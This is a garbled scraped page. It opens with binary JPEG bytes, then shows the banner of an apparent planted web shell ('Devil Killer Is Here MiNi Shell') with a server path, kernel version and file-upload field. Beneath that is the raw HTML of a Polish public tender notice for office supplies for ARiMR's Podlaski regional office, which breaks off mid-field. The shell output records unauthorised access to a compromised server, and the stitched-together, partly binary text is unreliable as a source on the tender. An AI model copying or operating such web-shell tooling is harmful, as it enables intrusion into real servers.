JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20231020/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20231020/0045450501-N-2023.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Dostawy<br/> Dostawa artykułów biurowych oraz materiałów archiwizacyjnych na potrzeby Podlaskiego Oddziału Regionalnego ARiMR oraz podległych jednostek organizacyjnych na terenie województwa podlaskiego </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">ARiMR Agencja Restrukturyzacji i Modernizacji Rolnictwa</span></h3> <h3 class="mb-0">1.3.) Oddział zamawiającego: <span class="normal">Podlaski Oddział Regionalny</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 010613083</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Nowa 2</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Łomża</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">18-400</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">podlaskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL842 - Łomżyński</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">+48862156311</span></h3> <h3 class="mb-0">1.5.8.) Numer faksu: <span class="normal">+48862164513</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">podlaski@arimr.gov.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.arimr.gov.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - agencja wykonawcza</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Inna działalność</span> </h3> <p class="mb-0"> wspieranie rozwoju rolnictwa i obszarów wiejskich w roli akredytowanej agencji płatniczej </p> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Dostawa artykułów biurowych oraz materiałów archiwizacyjnych na potrzeby Podlaskiego Oddziału Regionalnego ARiMR oraz podległych jednostek organizacyjnych na terenie województwa podlaskiego </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-edafe1d9-6f1f-11ee-a60c-9ec5599dddc1</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2023/BZP 00454505</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2023-10-20</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://platformazakupowa.pl/pn/arimr <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">1. Komunikacja między Zamawiającym a Wykonawcami w niniejszym postępowaniu<br/>odbywa się przy użyciu środków komunikacji elektronicznej, tj. Platformy Zakupowej, zwanej dalej „Platformą Zakupową” dostępnej<br/>pod adresem https://platformazakupowa.pl/pn/arimr, gdzie należy wybrać zakładkę „postępowania”, a następnie przejść na formularz<br/>niniejszego postępowania.<br/>2. Złożenie oferty wraz z Załącznikami odbywa się poprzez formularz składania ofert znajdujący się na Platformie Zakupowej (po<br/>przejściu do strony niniejszego postępowania z sekcji „Formularz”).<br/>3. Za datę przekazania (wpływu oświadczeń, dokumentów, wniosków, zawiadomień oraz informacji) przyjmuje się datę ich przesłania<br/>za pośrednictwem Platformy Zakupowej poprzez kliknięcie przycisku „Wyślij wiadomość do Zamawiającego”, po którym pojawi się<br/>komunikat, że wiadomość została wysłana do Zamawiającego.</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1.<br/>1) złożenie oferty możliwe jest przez Wykonawców, którzy posiadają konto na Platformie Zakupowej oraz przez Wykonawców<br/>nieposiadających konta na Platformie Zakupowej. W celu założenia konta na Platformie Zakupowej należy wybrać zakładkę „Zaloguj<br/>się” w kolejnym kroku należy wybrać „Załóż konto”, następnie należy wypełnić formularze i postępować zgodnie z poleceniami<br/>wyświetlającymi się ekranie monitora. W przypadku Wykonawców niezalogowanych w celu złożenia oferty niezbędne jest podanie<br/>adresu e-mail (na który wysyłane będzie potwierdzenie złożenia oferty), numeru NIP oraz nazwy firmy i nieobowiązkowo numeru<br/>telefonu,<br/>2) ofertę oraz oświadczenie, o którym mowa w art. 125 Ustawy, należy złożyć pod rygorem nieważności w formie elektronicznej<br/>podpisanej kwalifikowanym podpisem elektronicznym przez osoby upoważnione do tej czynności lub postaci elektronicznej<br/>opatrzonej podpisem zaufanym lub podpisem osobistym przez osoby upoważnione do tych czynności.<br/>3) Wykonawca składa ofertę, która w przypadku prawidłowego złożenia oferty zostaje automatycznie zaszyfrowana przez system.<br/>Nie jest możliwe zapoznanie się z treścią złożonej oferty przed upływem terminu otwarcia ofert,<br/>4) podpisywanie dokumentów w formie skompresowanej poprzez opatrzenie całego pliku jednym podpisem kwalifikowanym,<br/>podpisem zaufanym lub podpisem elektronicznym jest równoznaczne z opatrzeniem wszystkich dokumentów zawartych w tym pliku<br/>odpowiednio kwalifikowanym podpisem elektronicznym, podpisem zaufanym lub podpisem osobistym oraz z poświadczeniem za<br/>zgodność z oryginałem wszystkich elektronicznych kopii dokumentów. Dokumenty, co do których wymagana jest forma oryginału,<br/>muszą być podpisane indywidualnie (każdy z nich) kwalifikowanym podpisem elektronicznym, podpisem zaufanym lub podpisem<br/>osobistym.<br/>2.<br/>1) stały dostęp do sieci Internet o gwarantowanej przepustowości nie mniejszej niż 512 kb/s,<br/>2) komputer klasy PC lub MAC, o następującej konfiguracji: pamięć min. 2 GB Ram, procesor Intel IV 2 GHZ lub jego nowsza wersja,<br/>jeden z systemów operacyjnych – MS Windows 7, Mac Os x 10.4, Linux lub ich nowsze wersje,<br/>3) zainstalowana dowolna, inna przeglądarka internetowa niż Internet Explorer,<br/>4) włączona obsługa JavaScript,<br/>5) zainstalowany program Adobe Acrobat Reader lub inny obsługujący format plików PDF.<br/>3. dopuszczalne formaty przesyłanych danych tj. plików wielkości do 150 MB. Zalecany format PDF.<br/>4. W celu ewentualnej kompresji danych Zamawiający rekomenduje wykorzystanie jednego z formatów: .zip, .7Z.<br/>5. Użycie powszechnych a NIE występujących w Rozporządzeniu Rady Ministrów z dnia 12.04.2012 r. w sprawie Krajowych Ram<br/>Interoperacyjności, minimalnych wymagań dla rejestrów publicznych i wymiany informacji w postaci elektronicznej oraz minimalnych<br/>wymagań dla systemów teleinformatycznych (tj. Dz. U. z 2017 r., poz. 2247 ze zm.) formatów: .rar, .gif, .bmp, .numbers, .pages,<br/>spowoduje, że dokumenty złożone w takich plikach zostaną uznane za złożone nieskutecznie.<br/>6. informacje na temat kodowania i czasu odbioru danych, tj.:<br/>1) szyfrowanie na Platformie Zakupowej odbywa się za pomocą protokołu TLS 1.3,<br/>2) plik załączony przez Wykonawcę na Platformie Zakupowej i zapisany nie jest widoczny dla Zamawiającego, gdyż jest w systemie<br/>zaszyfrowany. Możliwość otworzenia pliku dostępna jest dopiero po odszyfrowaniu przez system, co następuje po terminie otwarcia<br/>ofert,<br/>3) oznaczenie czasu odbioru danych przez Platformę stanowi przypiętą do oferty elektronicznej data oraz dokładny czas (hh:mm:ss),<br/>znajdujące się w kolumnie dotyczącej danej oferty w sekcji „Data złożenia oferty”.<br/>7. dopuszczalny format kwalifikowanego podpisu elektronicznego, podpisu zaufanego oraz podpisu osobistego, w przypadku:<br/>1) dokumentów sporządzonych w formacie PDF zaleca się podpisanie dokumentu w formacie PAdES,<br/>2) dokumentów sporządzonych w formacie innym niż PDF zaleca się podpisanie dokumentu w formacie XAdES.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Klauzula informacyjna w zakresie przetwarzania danych osobowych została<br/>zamieszczona w Specyfikacji Warunków Zamówienia</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">Zamawiający nie przewiduje ograniczeń stosowania przepisów Rozporządzenia<br/>Parlamentu Europejskiego i Rady (UE) nr 2016/679 - zgodnie z art. 19 ust. 4 Ustawy prawo zamówień publicznych</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">BOR10.2619.3.2023.AK</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Dostawy</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">2</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.14.) Określenie aspektów społecznych, środowiskowych lub etykiet w opisie przedmiotu zamówienia: </h3> <p class="mb-0">Zamawiający żąda określonej etykiety lub wskazuje mające zastosowanie wymagania określonej etykiety, zgodnie z art. 104 ustaw - etykiety środowiskowej (tzw. Ekoetykieta)</p><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1.	Przedmiotem zamówienia jest dostawa artykułów biurowych na potrzeby Podlaskiego Oddziału Regionalnego ARiMR oraz podległych jednostek organizacyjnych na terenie województwa podlaskiego.<br/>2.	Szczegółowy opis przedmiotu zamówienia został zawarty w poniższym zestawieniu:<br/>Nazwa towaru<br/>Blok biurowy w kratkę A4 100 kartek<br/>Blok biurowy w kratkę A5 100 kartek<br/>Cienkopis z plastikową końcówką oprawioną w metal, z wentylowaną skuwką, tusz odporny na wysychanie, grubość linii pisania 0,4-0,5 mm, kolor czarny<br/>Cienkopis z plastikową końcówką oprawioną w metal, z wentylowaną skuwką, tusz odporny na wysychanie, grubość linii pisania 0,4-0,5 mm, kolor czerwony<br/>Cienkopis z plastikową końcówką oprawioną w metal, z wentylowaną skuwką, tusz odporny na wysychanie, grubość linii pisania 0,4-0,5 mm, kolor niebieski<br/>Cienkopis z plastikową końcówką oprawioną w metal, z wentylowaną skuwką, tusz odporny na wysychanie, grubość linii pisania 0,4-0,5 mm, kolor zielony<br/>Długopis automatyczny z wymiennym wkładem, elementy gumowe w części chwytowej, posiadający klips, końcówka kulkowa min. 0,6 mm, wkład kolor niebieski<br/>Długopis na sprężynce odpornej na odkształcenia, długość sprężynki po rozciągnięciu przynajmniej 80 cm, podstawka samoprzylepna, grubość linii pisania min. 0,3 mm, wymienny wkład koloru niebieskiego<br/>Długopis żelowy z wymiennym wkładem, gumowy wygodny uchwyt, grubość linii pisania min. 0,25 mm, długość linii pisania min. 1200 m, wkład koloru niebieskiego<br/>Dratwa/sznurek lniany lekko sztywny o średnicy min. 1,1 mm, szpula o długości ok. 120 metrów, kolor naturalny<br/>Druki &#34;potwierdzenia odbioru&#34;, wykorzystywane przy nadawaniu korespondencji w trybie Kodeksu Postępowania Administracyjnego. Wykonane na białym papierze offsetowym BD o gramaturze 140-200 g/m², 1) wymiar druku<br/>Wzór druku stanowi Załącznik nr 8 do SWZ.<br/>Dziurkacz biurowy wykonany z metalowej ramy i metalowej podstawy, wyposażony we wskaźnik środka strony i metalową listwę formatową. Rozstaw otworów 80 mm, średnica dziurki 5,5-6 mm, ma dziurkować do 30-40 kartek o gramaturze 80g/m2, głębokość wsuwania kartek 12 mm.<br/>Dziurkacz biurowy wykonany z metalowej ramy i metalowej podstawy, wyposażony we wskaźnik środka strony i metalową listwę formatową. Rozstaw otworów 80 mm, średnica dziurki 5,5-6 mm, ma dziurkować do 60-63 kartek o gramaturze 80g/m2, głębokość wsuwania kartek 12 mm.<br/>Etykieta samoprzylepna A3/na formacie A3 do wszystkich typów drukarek oraz kserokopiarek 297x420 mm (+/- 0,5mm), ilość arkuszy w opakowaniu 100 <br/>Etykieta samoprzylepna A4/na formacie A4 do wszystkich typów drukarek oraz kserokopiarek 210x297mm (+/- 0,5mm), ilość arkuszy w opakowaniu 100 <br/>Etykiety samoprzylepne formatu A4/na formacie A4 do wszystkich typów drukarek oraz kserokopiarek, podzielone w poziomie na 2 etykiety, wielkość jednej etykiety 210x148 (+/- 0,5mm) - ilość etykiet na arkuszu A4 - 2, ilość arkuszy w opakowaniu 100<br/>Etykiety samoprzylepne formatu A4/na formacie A4 do wszystkich typów drukarek oraz kserokopiarek, podzielone w poziomie na 6 etykiet wielkość jednej etykiety 105x48mm (+/- 0,5mm) - ilość etykiet na arkuszu A4 - 12, ilość arkuszy w opakowaniu 100<br/>Gumka biała do ścierania ołówka, nie brudząca papieru, ma ścierać nie naruszając struktury papieru, w kształcie prostopadłościanu, wymiary min. 40x20x10 mm <br/>Gumki recepturki, średnica (bez rozciągania) 70-80 mm, opakowanie 1 kg<br/>Kalka ołówkowa w kolorze niebieskim, format A4, opakowanie 50 arkuszy<br/>Karton klapowy 400x400x400 mm, wykonany z tektury 3-warstwowej o fali B - gramatura 450 g/m². Max. pojemność 64 L. Rodzaj kartonu:<br/>Klapowy - zamykany obustronnie za pomocą tzw. klapek. Do jego zamknięcia potrzeba taśmy.<br/>Kolor: Szary (brązowy) - naturalny kolor tektury. Ekologiczny, w 100% biodegradowalny.<br/>Klej w płynie z aplikatorem do sklejania papieru, pojemność: 40-50 ml<br/>Klipsy archiwizacyjne do spinania dokumentów, klips dwuczęściowy, wykonany z wytrzymałego polipropylenu, długość wąsów 80-90 mm, rozstawienie wąsów: 80mm., kolor biały, opakowanie 100 sztuk. <br/>Klipsy metalowe do spinania papieru 19 mm, opakowanie 12 sztuk<br/>Klipsy metalowe do spinania papieru 32 mm, opakowanie 12 sztuk<br/>Koperty bezpieczne B4 transparentne <br/>•trójwarstwowa folia LDPE o grubości 70 mikronów [+/ –5%], materiał trwały i odporny na warunki atmosferyczne, kod kreskowy dla ułatwienia identyfikacji i możliwości śledzenia przesyłki, kolejne, niepowtarzalne numerowanie kopert (pod taśmą zabezpieczającą i na kopercie), panel opisowy, bezpieczny zgrzew boczny płaski z mikronadrukiem - 9 mm [+/ –3%], trwałe zamknięcie samoprzylepne z paskiem i integratorem ciepła - taśma bezpieczna 35mm (z zabezpieczeniem mechanicznym, termicznym, chemicznym), dwa odrywane odcinki przewozowe (z numeracją koperty powieloną w kodzie kreskowym)<br/>Koperty DL HK (samoklejące z paskiem) z okienkiem standard z prawej strony, opakowanie 1000 sztuk<br/>Koperty formatu C4 HK (samoklejące z paskiem), bez okienka, białe, opakowanie 50 sztuk<br/>Koperty formatu C4 HK (samoklejące z paskiem), z okienkiem z prawej strony, białe, opakowanie 50 sztuk<br/>Koperty formatu C5 HK (samoklejące z paskiem) bez okienka, białe, opakowanie 50 sztuk<br/>Koperty formatu C5 HK (samoklejące z paskiem) okno prawe środek, białe, opakowanie 500 sztuk<br/>Koperty formatu C5 HK (samoklejące z paskiem) z okienkiem z prawej strony, białe, opakowanie 50 sztuk<br/>Koperty formatu C6 HK (samoklejące z paskiem), bez okienka, białe opakowanie 50 sztuk<br/>Koperty papierowe pełne (bez okienka) na płyty CD, opakowanie 100 sztuk<br/>Koperty papierowe z okienkiem na płyty CD, opakowanie 100 sztuk<br/>Koperty rozszerzane C4 HK, wymiary 229x324x40 (+/- 5 mm), gramatura papieru min. 120/g/m2, kolor brązowy, opakowanie 100 sztuk<br/>Korektor w pisaku z metalową końcówką o pojemności 6-7 ml <br/>Korektor w taśmie, można stosować do korekty wydruków na wszystkich rodzajach papieru, w obudowie przezroczystej, szerokość taśmy nie mniej niż 5 mm, długość taśmy nie mniejsza niż 5 m<br/>Kostka papierowa biała - wkład do pojemników plastikowych, klejona; rozmiar 83-85x83-85x35-40 mm<br/>Kostka samoprzylepna o wymiarach 51x38 mm (+/-2 mm), kartki w kolorze żółtym, każda kartka nasączona wzdłuż jednej krawędzi klejem umożliwiającym jej wielokrotne przyklejanie i odklejanie<br/>Kostka samoprzylepna o wymiarach 76x76 mm (+/-2 mm), kartki w kolorze żółtym, każda kartka nasączona wzdłuż jednej krawędzi klejem umożliwiającym jej wielokrotne przyklejanie i odklejanie<br/>Koszulka foliowa na płyty CD z możliwością wpięcia do segregatora, opakowanie 50 sztuk<br/>Koszulka krystaliczna na dokumenty formatu A4 z możliwością wpięcia do segregatora, bezbarwna, otwierana z góry, antystatyczna i antyrefleksyjna, folia o grubości min. 45 µm, opakowanie 100 sztuk<br/>Koszulka na dokumenty formatu A4 z klapą boczną z możliwością wpięcia do segregatora, bezbarwna, folia o grubości min. 100 µm, opakowanie 10 sztuk<br/>Koszulka na katalogi formatu A4, z możliwością wpięcia do segregatora. Otwarta od góry, bez klapki, bezbarwna, folia o grubości min. 150 µm, opakowanie 10 sztuk. <br/>Linijka przezroczysta, skala w centymetrach, długość 20 cm<br/>Linijka przezroczysta, skala w centymetrach, długość 30 cm<br/>Marker permanentny do opisywania płyt CD/DVD, wodoodporny, nietoksyczny, kolor czarny, grubość pisania 0,3-0,5 mm <br/>Marker permanentny do opisywania płyt CD/DVD, wodoodporny, nietoksyczny, kolor czerwony, grubość pisania 0,3-0,5 mm <br/>Marker permanentny do pisania po papierze, tekturze, szkle, plastiku, metalu, grubość pisania od 1,2 mm do 1,6 mm, kolor czarny<br/>Marker permanentny do pisania po papierze, tekturze, szkle, plastiku, metalu, grubość pisania od 1,2 mm do 1,6 mm, kolor czerwony<br/>Marker z tuszem olejowym, szybkoschnący, piszący po każdej powierzchni, wodoodporny, odporny na ścieranie, grubość pisania od 0,8 mm do 1,2 mm, kolor biały<br/>Marker z tuszem olejowym, szybkoschnący, piszący po każdej powierzchni, wodoodporny, odporny na ścieranie, grubość pisania od 0,8 mm do 1,2 mm, kolor czarny<br/>Nici bawełniane nabłyszczane, waga: min. 100 g, długość: min. 80 m, białe, udźwig: 10,7 kg, siła zrywająca: min. 11,2/Nm<br/>Nożyczki biurowe, długość nożyczek: 17-20 cm, ostrza z hartowanej nierdzewnej stali, niełamliwa rękojeść, dla prawo i leworęcznych<br/>Ołówek drewniany, lakierowany, bez gumki, zatemperowany, twardość grafitu HB<br/>Papier ksero formatu A4 biały o gram 120g/m², grubość min. 120 μm, białość min. 166 CIE, nieprzezroczystość min. 92%, wilgotność 3–6 %. posiada oznakowanie ekologiczne EU Ecolabel lub FSC (Forest Stewardship Council). Karton (5 ryz w kartonie, każda ryza po 250 kartek)<br/>Papier ksero formatu A4 biały o gram 80g/m²; grubość min. 104 μm, białość min. 164 CIE, nieprzezroczystość min. 92%, wilgotność 3–6 %; posiada oznakowanie ekologiczne EU Ecolabel lub FSC (Forest Stewardship Council) lub PEFC (Programme for Endorsement of Forest Certification). Karton (5 ryz w kartonie każda ryza po 500 kartek)<br/>Papier ksero formatu A4 biały o gramaturze 160g/m², ilość kartek w ryzie 250 sztuk<br/>Podkładka sztywna do pisania z okładką, zamykana, format A4, powleczona tworzywem sztucznym w kolorze niebieskim, wyposażona w mocny klip u góry służący do utrzymania kartek papieru <br/>Półka na dokumenty formatu A4, transparentna, wykonana z wytrzymałego plastiku, wymiary nie mniejsze niż 245 x 55 x 345 mm<br/>Przekładka kartonowa 1-12 kolor formatu A4- 12 przekładek numerycznych od 1 do 12<br/>Przekładki kartonowe 1/3 A4 100 szt.; mix kolorów wykonane z kartonu<br/>Przybornik na biurko siatkowy, trzyczęściowy pojemnik na długopisy, na kostkę papierową oraz na drobiazgi <br/>Rozszywacz mały biurowy do zszywek, metalowa konstrukcja, korpus wykonany z trwałego tworzywa.<br/>Segregator A4 50 mm Segregator wąski formatu A4/50 z mechanizmem dźwigowym, wykonany z kartonu pokrytego na zewnątrz folią, wymienna etykieta na grzbiecie, dolna krawędź wzmocniona metalową szyną, szerokość grzbietu 50 mm, kolor niebieski<br/>(...)<br/>3. Ze względu na ograniczona pojemność ogłoszenia cały zakres zamówienia zawiera SWZ.<br/>4. Warunki wykonania zamówienia zostały opisane w SWZ. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">30192000-1 - Wyroby biurowe</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">30197644-2 - Papier kserograficzny</p> <p class="mb-0">39292400-9 - Przybory do pisania</p> <p class="mb-0">22000000-0 - Druki i produkty podobne</p> <p class="mb-0">30197320-5 - Zszywacze</p> <p class="mb-0">30199230-1 - Koperty</p> <p class="mb-0">44617100-9 - Pudła kartonowe</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">21 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający 